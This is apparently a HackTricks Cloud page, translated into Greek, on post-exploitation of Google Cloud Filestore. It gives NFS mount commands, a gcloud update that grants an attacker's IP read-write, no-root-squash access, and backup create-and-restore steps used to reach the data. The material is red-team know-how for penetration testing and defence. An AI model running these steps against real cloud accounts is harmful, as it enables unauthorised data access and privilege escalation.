GCP - Filestore Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Filestore

Για περισσότερες πληροφορίες σχετικά με το Filestore, ελέγξτε:

GCP - Filestore Enum

Mount Filestore

Ένα κοινόχρηστο σύστημα αρχείων μπορεί να περιέχει ευαίσθητες πληροφορίες που είναι ενδιαφέρουσες από την προοπτική ενός επιτιθέμενου. Με πρόσβαση στο Filestore, είναι δυνατό να τοποθετηθεί:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Για να βρείτε τη διεύθυνση IP μιας παρουσίας filestore, ελέγξτε την ενότητα αρίθμησης της σελίδας:

GCP - Filestore Enum

Αφαίρεση Περιορισμών και απόκτηση επιπλέον δικαιωμάτων

Εάν ο επιτιθέμενος δεν βρίσκεται σε μια διεύθυνση IP με πρόσβαση στο κοινόχρηστο, αλλά έχετε αρκετά δικαιώματα για να το τροποποιήσετε, είναι δυνατόν να αφαιρέσετε τους περιορισμούς ή την πρόσβαση σε αυτό. Είναι επίσης δυνατό να παραχωρήσετε περισσότερα προνόμια στη διεύθυνση IP σας για να έχετε διαχειριστική πρόσβαση στο κοινόχρηστο:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Restore a backup

Αν υπάρχει ένα αντίγραφο ασφαλείας, είναι δυνατόν να το επαναφέρετε σε μια υπάρχουσα ή σε μια νέα παρουσία, ώστε οι πληροφορίες του να γίνουν προσβάσιμες:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Δημιουργία αντιγράφου ασφαλείας και αποκατάσταση

Αν δεν έχετε πρόσβαση σε ένα κοινόχρηστο και δεν θέλετε να το τροποποιήσετε, είναι δυνατόν να δημιουργήσετε ένα αντίγραφο ασφαλείας από αυτό και να το αποκαταστήσετε όπως αναφέρθηκε προηγουμένως:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 3 days ago